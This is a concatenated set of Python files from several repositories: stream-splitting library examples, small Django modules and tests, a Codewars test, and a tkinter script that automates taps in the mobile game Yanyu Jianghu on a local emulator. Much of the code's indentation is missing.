# of two values corresponding to the two output
# streams. addend is a keyword argument in the
# function that creates agents.
@split_e
def h(x, addend):
return [x+addend, x+1000+addend]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function.
ADDEND=10
h(s, [u,v], addend=ADDEND)
# Put data into input streams.
s.extend(DATA)
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [x+ADDEND for x in DATA]
assert recent_values(v) == [x+1000+ADDEND for x in DATA]
#----------------------------------------------
# EXAMPLE: SPLIT WITH KEYWORD ARGUMENT AND STATE
# Split a stream into a list of streams, with
# a keyword argument and state.
# Decorate a conventional function to get a
# stream function. addend and multiplicand are
# keyword arguments used in the call to create
# agents. The function h returns 2 values:
# (1) a list of two numbers corresponding to the
# two output streams and
# (2) the next state.
@split_e
def h(v, state, addend, multiplicand):
next_state = state + 2
return ([v+addend+state, v*multiplicand+state],
next_state)
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents. The initial state
# is 0. Include keyword arguments in the call.
ADDEND = 10
MULTIPLICAND = 2
h(s, [u,v], state=0, addend=ADDEND, multiplicand=MULTIPLICAND)
# Put data into input streams.
s.extend(DATA)
# Run the agent.
run()
# Check values of output streams.
assert recent_values(u) == [10, 13, 16, 19, 22]
assert recent_values(v) == [0, 4, 8, 12, 16]
#----------------------------------------------
# EXAMPLE: SPLIT WITH STATE AND NO KEYWORD ARGUMENTS
# Split a stream into a list of streams, with
# a state.
# Decorate a conventional function to get a
# stream function. This function returns two values
# a list and the next state, where the list has two
# values with one value for each output streams.
@split_e
def h(v, state):
next_state = state + 1
return [v+state, v+1000+state], next_state
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents.
h(in_stream=s, out_streams=[u,v], state=0)
# Put data into input streams.
s.extend(DATA)
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [0, 2, 4, 6, 8]
assert recent_values(v) == [1000, 1002, 1004, 1006, 1008]
#----------------------------------------------
# EXAMPLE: SPLIT USING FUNCTIONAL FORM FOR
# SPLITTING A STREAM INTO 2 STREAMS.
# Split a stream into exactly two streams.
# This is in functional form, i.e. it creates
# and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def h(v):
return [v, v+1000]
# Create streams.
s = Stream()
# Call decorated function to create agents
# Note that h creates streams u, v. It creates
# 2 streams because the decorator is fsplit_2e
u, v = h(s)
# Put data into input streams.
s.extend(DATA)
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == DATA
assert recent_values(v) == [1000+x for x in DATA]
#----------------------------------------------
# EXAMPLE: SPLIT USING FUNCTIONAL FORM FOR
# SPLITTING A STREAM INTO 2 STREAMS.
# Split a stream into exactly two streams, with a
# keyword argument. This is in functional
# form, i.e. it creates and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def h(v, addend):
return [v+addend, v+1000+addend]
# Create streams.
s = Stream()
# Call decorated function to create agents. Note
# functional form.
u, v = h(s, addend=10)
# Put data into input streams.
s.extend(DATA)
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [10, 11, 12, 13, 14]
assert recent_values(v) == [1010, 1011, 1012, 1013, 1014]
#----------------------------------------------
# EXAMPLE: FUNCTIONAL FORM
# Split a stream into exactly two streams, with a
# state and keyword argument. This is in functional
# form, i.e. it creates and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def h(v, state, addend):
next_state = state + 1
return ([v+addend+state, v+1000+addend+state],
next_state)
# Create streams.
s = Stream()
# Call decorated function.
u, v = h(s, state=0, addend=10)
# Put data into input streams.
s.extend(list(range(5)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [10, 12, 14, 16, 18]
assert recent_values(v) == [1010, 1012, 1014, 1016, 1018]
#----------------------------------------------
# Split a stream into exactly two streams, with a
# state. This is in functional form,
# i.e. it creates and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def hk(v, state):
next_state = state + 1
return [v+state, v+1000+state], next_state
# Create streams.
s = Stream()
    # Call decorated function.
    u, v = hk(s, state=0)
# Put data into input streams.
s.extend(list(range(5)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [0, 2, 4, 6, 8]
assert recent_values(v) == [1000, 1002, 1004, 1006, 1008]
#----------------------------------------------
# Split a stream into a list of streams.
# Window operation
# Decorate a conventional function to get a
# stream function.
@split_w
def h(window):
return [sum(window), max(window)]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function.
h(s, [u,v], window_size=3, step_size=2)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [3, 9, 15, 21, 27]
assert recent_values(v) == [2, 4, 6, 8, 10]
#----------------------------------------------
# Split a stream into a list of streams with
# keyword argument. Window operation
# Decorate a conventional function to get a
# stream function.
@split_w
def h(window, addend):
return [sum(window)+addend, max(window)+addend]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents.
h(s, [u,v], window_size=3, step_size=2, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1009, 1015, 1021, 1027]
assert recent_values(v) == [1002, 1004, 1006, 1008, 1010]
#----------------------------------------------
# Split a stream into a list of streams with state and
# keyword argument. Window operation
# Decorate a conventional function to get a
# stream function.
@split_w
def h(window, state, addend):
next_state = state + 1
return ([sum(window)+addend+state,
max(window)+addend+state], next_state)
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function.
h(s, [u,v], window_size=3, step_size=2, state=0, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1010, 1017, 1024, 1031]
assert recent_values(v) == [1002, 1005, 1008, 1011, 1014]
#----------------------------------------------
# SPLITTING WITH WINDOWS
#----------------------------------------------
# EXAMPLE
# Split a stream into a list of streams with state.
# Window operation
# Decorate a conventional function to get a
# stream function. The first argument of the function
# is a list, i.e., the window. The function returns
# two values: a list and the next state where the list
# has one item for each output stream.
@split_w
def h(window, state):
next_state = state + 1
return [sum(window)+state, max(window)+state], next_state
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents.
h(s, [u,v], window_size=3, step_size=2, state=0)
# Put data into input streams.
s.extend(list(range(12)))
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [3, 10, 17, 24, 31]
assert recent_values(v) == [2, 5, 8, 11, 14]
#----------------------------------------------
# Split a stream into exactly TWO streams.
# WINDOW operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns a list of streams.
@fsplit_2w
def h(window):
return sum(window), max(window)
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [3, 9, 15, 21, 27]
assert recent_values(v) == [2, 4, 6, 8, 10]
#----------------------------------------------
# Split a stream into exactly two streams with
# keyword argument. Window operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns two streams.
@fsplit_2w
def h(window, addend):
return sum(window)+addend, max(window)+addend*2
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1009, 1015, 1021, 1027]
assert recent_values(v) == [2002, 2004, 2006, 2008, 2010]
#----------------------------------------------
# Split a stream into exactly two streams with
# state and keyword argument. Window operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns two streams.
@fsplit_2w
def h(window, state, addend):
next_state = state + 1
return ([sum(window)+addend+state,
max(window)+addend*2-state], next_state)
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2,
state=0, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1010, 1017, 1024, 1031]
assert recent_values(v) == [2002, 2003, 2004, 2005, 2006]
#----------------------------------------------
# Split a stream into exactly two streams with
# state. Window operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns two streams.
@fsplit_2w
def h(window, state):
next_state = state + 1
return [sum(window)+state, max(window)-state], next_state
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2, state=0)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [3, 10, 17, 24, 31]
assert recent_values(v) == [2, 3, 4, 5, 6]
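# The window-split examples above can be mimicked in plain Python. The helper
# below is a sketch (an assumption about the semantics, not the library's
# implementation): it slides a window of window_size over the input, advancing
# by step_size, dropping any trailing partial window, and threads the state.

```python
def window_split(seq, f, window_size, step_size, state):
    """Slide a window over seq, applying f(window, state) -> ([a, b], next_state)."""
    out1, out2 = [], []
    for i in range(0, len(seq) - window_size + 1, step_size):
        (a, b), state = f(seq[i:i + window_size], state)
        out1.append(a)
        out2.append(b)
    return out1, out2

def h(window, state):
    return [sum(window) + state, max(window) - state], state + 1

u, v = window_split(list(range(12)), h, window_size=3, step_size=2, state=0)
assert u == [3, 10, 17, 24, 31]
assert v == [2, 3, 4, 5, 6]
```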
if __name__ == '__main__':
examples()
#==================================================================
# src/visualization/__init__.py
# repo: daniellepaynter/snapshot_pilot (license: MIT)
#==================================================================
from .snapshotpilot_dataproc_mod import *
#==================================================================
# authors/apps/orders/admin.py
# repo: hoslack/jua-kali_Backend (license: BSD-3-Clause)
#==================================================================
from django.contrib import admin
from .models import Order
class AuthorAdmin(admin.ModelAdmin):
pass
admin.site.register(Order, AuthorAdmin)
#==================================================================
# efp/__init__.py
# repo: cmptrgeekken/eve-fit-parser (license: MIT)
#==================================================================
from .efp import *
#==================================================================
# async_translate/providers/deepl/__init__.py
# repo: Memotic/async-translate (license: MIT)
#==================================================================
from .deepl import DeepL
#==================================================================
# tests/fixtures_transforms.py
# repo: kristianeschenburg/mantarray-waveform-analysis (license: MIT)
#==================================================================
# -*- coding: utf-8 -*-
"""Fixtures for testing the transforms."""
from mantarray_waveform_analysis import BESSEL_LOWPASS_10_UUID
from mantarray_waveform_analysis import CENTIMILLISECONDS_PER_SECOND
from mantarray_waveform_analysis import create_filter
import pytest
@pytest.fixture(scope="session", name="bessel_lowpass_10_for_100hz")
def fixture_bessel_lowpass_10_for_100hz():
return create_filter(BESSEL_LOWPASS_10_UUID, (1 / 100) * CENTIMILLISECONDS_PER_SECOND)
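# A sketch of the unit arithmetic behind the fixture's second argument. The
# value of CENTIMILLISECONDS_PER_SECOND below is an assumption (1 cms = 10**-5 s,
# so 100_000 per second), not read from the library: a 100 Hz sampling rate then
# corresponds to a period of 1000 centimilliseconds.

```python
CENTIMILLISECONDS_PER_SECOND = 100_000  # assumption: 1 centimillisecond = 10**-5 s
sampling_rate_hz = 100
sampling_period_cms = (1 / sampling_rate_hz) * CENTIMILLISECONDS_PER_SECOND
assert sampling_period_cms == 1000.0
```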
#==================================================================
# Codewars/7kyu/find-all-pairs-1/Python/test.py
# repo: RevansChen/online-judge (license: MIT)
#==================================================================
# Python - 3.6.0
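# The kata function `duplicates` is not defined in this test file. A plausible
# reference implementation (an assumption, not the kata author's code) counts
# how many complete pairs each distinct value forms:

```python
from collections import Counter

def duplicates(arr):
    # each value contributes count // 2 complete pairs
    return sum(count // 2 for count in Counter(arr).values())

assert duplicates([1, 2, 5, 6, 5, 2]) == 2
```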
test.assert_equals(duplicates([1, 2, 5, 6, 5, 2]) , 2)
test.assert_equals(duplicates([1, 2, 2, 20, 6, 20, 2, 6, 2]), 4)
test.assert_equals(duplicates([0, 0, 0, 0, 0, 0, 0]) , 3)
test.assert_equals(duplicates([1000, 1000]), 1)
test.assert_equals(duplicates([]), 0)
test.assert_equals(duplicates([54]), 0)
#==================================================================
# YanyuAutoScript/gui.py
# repo: HYLnP/YanyuAutoScript (license: MIT)
#==================================================================
# -*- coding:utf-8 -*-
# Author: HYL
# Date: 2021-11-17
import time
from tkinter import Tk, Button
import threading
import uiautomator2 as u2
print('Welcome to the Yanyu Jianghu script. Commercial use of this script is prohibited.')
print("The starting position is at the Mount Tai carriage stop. Carriage tickets are required; check that you have them before use.")
class MainWindow(Tk):
"""继承Tk,实例化窗口"""
def __init__(self):
super().__init__()
        self.title('Yanyu Jianghu Script')
        self.geometry('300x300+20+20')
        print('Initializing the script UI')
        self.main_event()
        print('Connecting to the emulator')
        self.device = u2.connect('127.0.0.1:5555')
        print('Connected')
print('-------------------------------------------------------------------')
def main_event(self):
"""事件主体"""
btn1 = Button(self, text='塞北刷怪', command=lambda: MainWindow.thread_it(self.sai_bei))
btn1.place(x=20, y=100)
btn2 = Button(self, text='燕王阁3次', command=lambda: MainWindow.thread_it(self.yan_wang))
btn2.place(x=100, y=100)
btn3 = Button(self, text='枯骨门1次', command=lambda: MainWindow.thread_it(self.ku_gu))
btn3.place(x=180, y=100)
btn4 = Button(self, text='天一教1次', command=lambda: MainWindow.thread_it(self.tian_yi))
btn4.place(x=20, y=200)
btn5 = Button(self, text='铁刃门1次', command=lambda: MainWindow.thread_it(self.tie_ren))
btn5.place(x=100, y=200)
btn5 = Button(self, text='一键运行所有', command=lambda: MainWindow.thread_it(self.yi_jian))
btn5.place(x=180, y=200)
def sai_bei(self):
"""塞北刷怪"""
print('泰山到塞北')
self.device.click(0.214, 0.95)
time.sleep(2)
self.device.click(0.312, 0.819)
time.sleep(2)
self.device.click(0.362, 0.12)
time.sleep(5)
self.device.click(0.224, 0.372)
time.sleep(5)
self.device.click(0.096, 0.585)
time.sleep(6)
self.device.click(0.43, 0.471)
time.sleep(6)
self.device.click(0.268, 0.634)
time.sleep(6)
self.device.click(0.432, 0.468)
time.sleep(6)
self.device.click(0.108, 0.769)
time.sleep(6)
self.device.click(0.21, 0.393)
time.sleep(6)
        print('Starting mob grind')
for i in range(10):
self.device.click(0.378, 0.436)
time.sleep(5)
self.device.click(0.548, 0.691)
time.sleep(5)
self.device.click(0.712, 0.347)
time.sleep(5)
self.device.click(0.38, 0.741)
time.sleep(5)
self.device.click(0.662, 0.489)
time.sleep(5)
self.device.click(0.09, 0.691)
time.sleep(5)
self.device.click(0.258, 0.209)
time.sleep(5)
        print('Returning to Mount Tai')
self.device.click(0.258, 0.209)
time.sleep(5)
self.device.click(0.198, 0.957)
time.sleep(3)
self.device.click(0.274, 0.804)
time.sleep(3)
self.device.click(0.742, 0.609)
time.sleep(3)
self.device.click(0.592, 0.861)
time.sleep(10)
        print('Mob grinding finished')
def yan_wang(self):
print("""泰山到幽州""")
self.device.click(0.204, 0.946)
time.sleep(2)
self.device.click(0.296, 0.822)
time.sleep(2)
self.device.click(0.58, 0.294)
time.sleep(2)
self.device.click(0.432, 0.549)
time.sleep(8)
print("""走到副本前面""")
self.device.click(0.672, 0.797)
time.sleep(5)
self.device.click(0.212, 0.776)
time.sleep(5)
self.device.click(0.658, 0.691)
time.sleep(5)
self.device.click(0.688, 0.691)
time.sleep(5)
self.device.click(0.734, 0.748)
time.sleep(5)
self.device.click(0.736, 0.755)
time.sleep(5)
self.device.click(0.552, 0.595)
time.sleep(5)
print("""第一次与士兵对话""")
self.device.click(0.924, 0.539)
time.sleep(5)
self.device.click(0.6, 0.436)
time.sleep(5)
self.device.click(0.596, 0.421)
time.sleep(5)
self.device.click(0.646, 0.439)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# -------------------------------------
print("""第二次与士兵对话""")
self.device.click(0.544, 0.588) # 走过去
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# --------------------------------------
print("""第三次与士兵对话""")
self.device.click(0.544, 0.588) # 走过去
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.592, 0.613)
time.sleep(2)
self.device.click(0.456, 0.861)
time.sleep(6)
        print('---------------------- Yanwang Pavilion done -------------------')
def ku_gu(self):
print("""从泰山到杭州""")
self.device.click(0.208, 0.943)
time.sleep(2)
self.device.click(0.302, 0.804)
time.sleep(2)
self.device.click(0.616, 0.698)
time.sleep(2)
self.device.click(0.478, 0.936)
time.sleep(8)
print("""走到副本""")
self.device.click(0.044, 0.734)
time.sleep(5)
self.device.click(0.216, 0.294)
time.sleep(5)
self.device.click(0.26, 0.326)
time.sleep(5)
self.device.click(0.444, 0.18)
time.sleep(5)
self.device.click(0.928, 0.546)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.808, 0.581)
time.sleep(5)
self.device.click(0.548, 0.18)
time.sleep(5)
self.device.click(0.214, 0.088)
time.sleep(5)
self.device.click(0.772, 0.776)
time.sleep(5)
self.device.click(0.665, 0.588)
time.sleep(5)
self.device.click(0.688, 0.287)
time.sleep(5)
self.device.click(0.712, 0.514)
time.sleep(5)
self.device.click(0.49, 0.262)
time.sleep(5)
self.device.click(0.748, 0.216)
time.sleep(5)
self.device.click(0.654, 0.588)
time.sleep(5)
self.device.click(0.596, 0.138)
time.sleep(5)
self.device.click(0.768, 0.287)
time.sleep(5)
self.device.click(0.494, 0.407)
time.sleep(8)
self.device.click(0.662, 0.258)
time.sleep(5)
self.device.click(0.152, 0.549)
time.sleep(5)
self.device.click(0.608, 0.432)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
        print('---------------------- Kugu Gate done -------------------')
def tian_yi(self):
print("""从泰山到成都""")
self.device.click(0.21, 0.96)
time.sleep(2)
self.device.click(0.296, 0.815)
time.sleep(2)
self.device.click(0.154, 0.907)
time.sleep(2)
self.device.click(0.016, 0.939)
time.sleep(8)
print("""走到副本""")
self.device.click(0.436, 0.797)
time.sleep(5)
self.device.click(0.598, 0.734)
time.sleep(5)
self.device.click(0.92, 0.535)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(8)
print("""进入副本刷怪""")
self.device.click(0.754, 0.79)
time.sleep(5)
self.device.click(0.662, 0.585)
time.sleep(5)
self.device.click(0.758, 0.776)
time.sleep(5)
self.device.click(0.716, 0.539)
time.sleep(5)
self.device.click(0.432, 0.287)
time.sleep(5)
self.device.click(0.588, 0.23)
time.sleep(5)
self.device.click(0.268, 0.241)
time.sleep(5)
self.device.click(0.208, 0.109)
time.sleep(5)
self.device.click(0.766, 0.202)
time.sleep(5)
self.device.click(0.438, 0.599)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.938, 0.251)
time.sleep(2)
self.device.click(0.794, 0.521)
time.sleep(6)
        print('---------------------- Tianyi Sect done -------------------')
def tie_ren(self):
print("""泰山到杭州""")
self.device.click(0.202, 0.946)
time.sleep(2)
self.device.click(0.304, 0.819)
time.sleep(2)
self.device.click(0.614, 0.698)
time.sleep(2)
self.device.click(0.476, 0.946)
time.sleep(8)
print("""走到副本""")
self.device.click(0.048, 0.726)
time.sleep(5)
self.device.click(0.214, 0.294)
time.sleep(5)
self.device.click(0.248, 0.322)
time.sleep(5)
self.device.click(0.206, 0.294)
time.sleep(5)
self.device.click(0.104, 0.581)
time.sleep(5)
self.device.click(0.146, 0.762)
time.sleep(5)
self.device.click(0.264, 0.343)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.208, 0.258)
time.sleep(5)
self.device.click(0.712, 0.248)
time.sleep(5)
self.device.click(0.72, 0.237)
time.sleep(5)
self.device.click(0.66, 0.294)
time.sleep(5)
self.device.click(0.378, 0.237)
time.sleep(5)
self.device.click(0.656, 0.496)
time.sleep(5)
self.device.click(0.656, 0.393)
time.sleep(5)
self.device.click(0.434, 0.691)
time.sleep(5)
self.device.click(0.604, 0.429)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print("-----------------铁刃门完成--------------------")
def yi_jian(self):
print("-----------一键任务开始运行--------------")
self.sai_bei()
self.yan_wang()
self.ku_gu()
self.tian_yi()
self.tie_ren()
print("-----------一键任务运行结束--------------")
@staticmethod
def thread_it(func, *args):
"""多线程防止阻塞"""
t = threading.Thread(target=func, args=args)
t.setDaemon(True) # 守护
t.start() # 启动
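    # The thread_it pattern can be sketched standalone. run_in_background below
    # is a hypothetical helper (not part of this script): it runs a callable on
    # a daemon thread so a blocking task never freezes the caller.

```python
import threading

def run_in_background(func, *args):
    """Run func(*args) on a daemon thread and return the Thread object."""
    t = threading.Thread(target=func, args=args, daemon=True)
    t.start()
    return t

results = []
t = run_in_background(results.append, 42)
t.join()  # wait only so we can observe the side effect
assert results == [42]
```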
if __name__ == '__main__':
app = MainWindow()
    app.mainloop()
#==================================================================
# response_screen/tests.py
# repo: snowminc/Groupformer (license: MIT)
#==================================================================
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from django.contrib.staticfiles.testing import LiveServerTestCase
from time import sleep
from selenium.webdriver.firefox.webdriver import WebDriver
from dbtools.models import *
def create_sample_groupformer():
User.objects.create_user("mchon", "minc1@umbc.edu", "pahKygvg")
User.objects.create_user("bjohn", "ben.johnson@umbc.edu", "MnbHtgUr")
gfs = {}
gfs[1] = {}
gfs[1]['gf'] = addGroupFormer("Min Chon", "minc1@umbc.edu", "34")
gfs[2] = {}
gfs[2]['gf'] = addGroupFormer("Ben Johnson", "ben.johnson@umbc.edu", "24")
return gfs
def create_sample_projects(gfs):
gfs[1]['p1'] = Project.objects.create(group_former=gfs[1]['gf'], project_name="Groupformer Tool", project_description="Create a tool that creates groups!")
gfs[1]['p2'] = Project.objects.create(group_former=gfs[1]['gf'], project_name="Robot that pees beer", project_description="Create a modification on a very expensive robot dog!")
gfs[2]['p1'] = Project.objects.create(group_former=gfs[2]['gf'], project_name="Literally Something", project_description="Literally Anything!")
gfs[2]['p2'] = Project.objects.create(group_former=gfs[2]['gf'], project_name="What", project_description="I dont know.")
def create_sample_attributes(gfs):
# Intentionally do not create attributes for second groupformer
gfs[1]['a1'] = Attribute.objects.create(group_former=gfs[1]['gf'], attr_name="Back-End", is_homogenous=False, is_continuous=True)
gfs[1]['a2'] = Attribute.objects.create(group_former=gfs[1]['gf'], attr_name="Front-End", is_homogenous=True, is_continuous=True)
gfs[1]['a3'] = Attribute.objects.create(group_former=gfs[1]['gf'], attr_name="Dog Lover", is_homogenous=False, is_continuous=False)
def create_sample_participants(gfs):
names = ["Min","Kristian","Sarah","Morgan","Kyle","Ben","Eric","Andrew"]
for i in range(len(names)):
gfs[1]['part'+str(i+1)] = Participant.objects.create(group_former=gfs[1]['gf'], part_name=names[i], part_email=f"{names[i]}@email.com")
gfs[2]['part'+str(i+1)] = Participant.objects.create(group_former=gfs[2]['gf'], part_name=names[i], part_email=f"{names[i]}@email.com")
return names
def create_all_samples():
gfs = create_sample_groupformer()
create_sample_projects(gfs)
create_sample_attributes(gfs)
create_sample_participants(gfs)
return gfs
class MinIteration3ResponseScreenTests(TestCase):
def login_to_sample_groupformer(self):
self.client.post(reverse('response_screen:login', kwargs={"groupformer_id": 1}), {"email": "Kristian@email.com"})
def test_displays_all_projects(self):
"""
Check if the projects created appear on the form
"""
create_all_samples()
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Groupformer Tool")
self.assertContains(response, "Robot that pees beer")
self.assertContains(response, "Create a tool that creates groups!")
self.assertContains(response, "Create a modification on a very expensive robot dog!")
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Literally Something")
self.assertContains(response, "What")
self.assertContains(response, "Literally Anything!")
self.assertContains(response, "I dont know.")
def test_displays_projects_without_attributes(self):
"""
Check if the form still displays projects even if no attributes were created
"""
gfs = create_sample_groupformer()
create_sample_projects(gfs)
create_sample_participants(gfs)
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Groupformer Tool")
self.assertContains(response, "Robot that pees beer")
self.assertContains(response, "Create a tool that creates groups!")
self.assertContains(response, "Create a modification on a very expensive robot dog!")
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Literally Something")
self.assertContains(response, "What")
self.assertContains(response, "Literally Anything!")
self.assertContains(response, "I dont know.")
def test_displays_all_attributes(self):
"""
Check if all attributes appear on the form
"""
create_all_samples()
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Back-End")
self.assertContains(response, "Front-End")
self.assertContains(response, "Dog Lover")
# The second GroupFormer intentionally does not have any attributes
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Back-End")
self.assertNotContains(response, "Front-End")
self.assertNotContains(response, "Dog Lover")
def test_displays_attributes_without_projects(self):
"""
Check if the form still displays attributes even if no projects were created
"""
gfs = create_sample_groupformer()
create_sample_attributes(gfs)
create_sample_participants(gfs)
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Back-End")
